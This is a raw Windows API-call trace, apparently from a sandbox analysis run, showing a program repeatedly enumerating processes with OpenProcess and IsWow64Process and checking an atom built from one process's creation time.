	[0080.765] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.765] CloseHandle (hObject=0x2c8) returned 1
	[0080.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2c8
	[0080.765] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.765] CloseHandle (hObject=0x2c8) returned 1
	[0080.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2c8
	[0080.766] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.766] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0080.766] GetProcessTimes (in: hProcess=0x2c8, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0080.766] wsprintfA (in: param_1=0x7bbc38, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0080.766] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.766] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0080.767] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.767] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0080.767] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0080.767] CloseHandle (hObject=0x2c8) returned 1
	[0080.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0080.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0080.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x2c8
	[0080.767] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.767] CloseHandle (hObject=0x2c8) returned 1
	[0080.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0080.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0080.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0080.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0080.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0080.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0080.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0080.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0080.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0080.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0080.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0080.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0080.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0080.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0080.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0080.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0080.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0080.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0080.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x32c
	[0080.863] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.863] CloseHandle (hObject=0x32c) returned 1
	[0080.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0080.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0080.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x32c
	[0080.864] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.864] CloseHandle (hObject=0x32c) returned 1
	[0080.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0080.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x32c
	[0080.864] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.864] CloseHandle (hObject=0x32c) returned 1
	[0080.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x32c
	[0080.864] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.864] CloseHandle (hObject=0x32c) returned 1
	[0080.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x32c
	[0080.864] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.864] CloseHandle (hObject=0x32c) returned 1
	[0080.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x32c
	[0080.864] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.864] CloseHandle (hObject=0x32c) returned 1
	[0080.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x32c
	[0080.865] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.865] CloseHandle (hObject=0x32c) returned 1
	[0080.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x32c
	[0080.865] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.865] CloseHandle (hObject=0x32c) returned 1
	[0080.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0080.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x32c
	[0080.865] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.865] CloseHandle (hObject=0x32c) returned 1
	[0080.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x32c
	[0080.865] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.865] CloseHandle (hObject=0x32c) returned 1
	[0080.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x32c
	[0080.865] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.865] CloseHandle (hObject=0x32c) returned 1
	[0080.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0080.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x32c
	[0080.866] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.866] CloseHandle (hObject=0x32c) returned 1
	[0080.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x32c
	[0080.866] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.866] CloseHandle (hObject=0x32c) returned 1
	[0080.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x32c
	[0080.866] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.866] CloseHandle (hObject=0x32c) returned 1
	[0080.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x32c
	[0080.866] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.866] CloseHandle (hObject=0x32c) returned 1
	[0080.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x32c
	[0080.866] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.866] CloseHandle (hObject=0x32c) returned 1
	[0080.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x32c
	[0080.866] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.866] CloseHandle (hObject=0x32c) returned 1
	[0080.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x32c
	[0080.867] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.867] CloseHandle (hObject=0x32c) returned 1
	[0080.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x32c
	[0080.867] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.867] CloseHandle (hObject=0x32c) returned 1
	[0080.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x32c
	[0080.867] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.867] CloseHandle (hObject=0x32c) returned 1
	[0080.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x32c
	[0080.867] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.867] CloseHandle (hObject=0x32c) returned 1
	[0080.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x32c
	[0080.867] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.867] CloseHandle (hObject=0x32c) returned 1
	[0080.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x32c
	[0080.867] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.867] CloseHandle (hObject=0x32c) returned 1
	[0080.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x32c
	[0080.868] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.868] CloseHandle (hObject=0x32c) returned 1
	[0080.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x32c
	[0080.868] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.868] CloseHandle (hObject=0x32c) returned 1
	[0080.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x32c
	[0080.868] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.868] CloseHandle (hObject=0x32c) returned 1
	[0080.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x32c
	[0080.868] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.868] CloseHandle (hObject=0x32c) returned 1
	[0080.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x32c
	[0080.868] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.868] CloseHandle (hObject=0x32c) returned 1
	[0080.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x32c
	[0080.868] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.868] CloseHandle (hObject=0x32c) returned 1
	[0080.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x32c
	[0080.868] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.868] CloseHandle (hObject=0x32c) returned 1
	[0080.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x32c
	[0080.869] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.869] CloseHandle (hObject=0x32c) returned 1
	[0080.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x32c
	[0080.869] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.869] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0080.869] GetProcessTimes (in: hProcess=0x32c, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0080.869] wsprintfA (in: param_1=0x73a510, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0080.870] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.870] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0080.870] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.870] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0080.870] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0080.870] CloseHandle (hObject=0x32c) returned 1
	[0080.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0080.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0080.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x32c
	[0080.870] IsWow64Process (in: hProcess=0x32c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.870] CloseHandle (hObject=0x32c) returned 1
	[0080.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0080.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0080.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0080.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0080.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0080.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0080.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0080.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0080.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0080.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0080.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0080.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0080.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0080.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0080.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0080.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0080.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0080.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0080.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x34c
	[0080.949] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.949] CloseHandle (hObject=0x34c) returned 1
	[0080.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0080.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0080.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x34c
	[0080.949] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.949] CloseHandle (hObject=0x34c) returned 1
	[0080.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0080.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x34c
	[0080.949] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.949] CloseHandle (hObject=0x34c) returned 1
	[0080.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x34c
	[0080.949] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.949] CloseHandle (hObject=0x34c) returned 1
	[0080.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x34c
	[0080.950] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.950] CloseHandle (hObject=0x34c) returned 1
	[0080.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x34c
	[0080.950] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.950] CloseHandle (hObject=0x34c) returned 1
	[0080.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x34c
	[0080.950] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.950] CloseHandle (hObject=0x34c) returned 1
	[0080.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x34c
	[0080.950] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.950] CloseHandle (hObject=0x34c) returned 1
	[0080.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0080.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x34c
	[0080.950] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.950] CloseHandle (hObject=0x34c) returned 1
	[0080.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x34c
	[0080.950] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.950] CloseHandle (hObject=0x34c) returned 1
	[0080.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x34c
	[0080.951] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.951] CloseHandle (hObject=0x34c) returned 1
	[0080.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0080.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x34c
	[0080.951] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.951] CloseHandle (hObject=0x34c) returned 1
	[0080.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x34c
	[0080.951] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.951] CloseHandle (hObject=0x34c) returned 1
	[0080.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x34c
	[0080.951] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.951] CloseHandle (hObject=0x34c) returned 1
	[0080.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x34c
	[0080.951] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.951] CloseHandle (hObject=0x34c) returned 1
	[0080.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x34c
	[0080.952] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.952] CloseHandle (hObject=0x34c) returned 1
	[0080.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x34c
	[0080.952] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.952] CloseHandle (hObject=0x34c) returned 1
	[0080.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x34c
	[0080.952] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.952] CloseHandle (hObject=0x34c) returned 1
	[0080.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x34c
	[0080.952] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.952] CloseHandle (hObject=0x34c) returned 1
	[0080.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x34c
	[0080.952] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.952] CloseHandle (hObject=0x34c) returned 1
	[0080.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x34c
	[0080.952] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.952] CloseHandle (hObject=0x34c) returned 1
	[0080.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x34c
	[0080.953] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.953] CloseHandle (hObject=0x34c) returned 1
	[0080.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x34c
	[0080.953] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.953] CloseHandle (hObject=0x34c) returned 1
	[0080.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x34c
	[0080.953] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.953] CloseHandle (hObject=0x34c) returned 1
	[0080.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x34c
	[0080.953] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.953] CloseHandle (hObject=0x34c) returned 1
	[0080.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x34c
	[0080.953] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.953] CloseHandle (hObject=0x34c) returned 1
	[0080.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x34c
	[0080.953] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.953] CloseHandle (hObject=0x34c) returned 1
	[0080.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x34c
	[0080.954] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.954] CloseHandle (hObject=0x34c) returned 1
	[0080.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x34c
	[0080.954] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.954] CloseHandle (hObject=0x34c) returned 1
	[0080.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x34c
	[0080.954] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.954] CloseHandle (hObject=0x34c) returned 1
	[0080.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x34c
	[0080.954] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.954] CloseHandle (hObject=0x34c) returned 1
	[0080.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x34c
	[0080.954] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.955] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0080.955] GetProcessTimes (in: hProcess=0x34c, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0080.955] wsprintfA (in: param_1=0x73be78, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0080.955] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.955] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0080.955] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.955] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0080.955] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0080.955] CloseHandle (hObject=0x34c) returned 1
	[0080.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0080.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0080.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x34c
	[0080.956] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.956] CloseHandle (hObject=0x34c) returned 1
	[0081.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0081.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0081.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
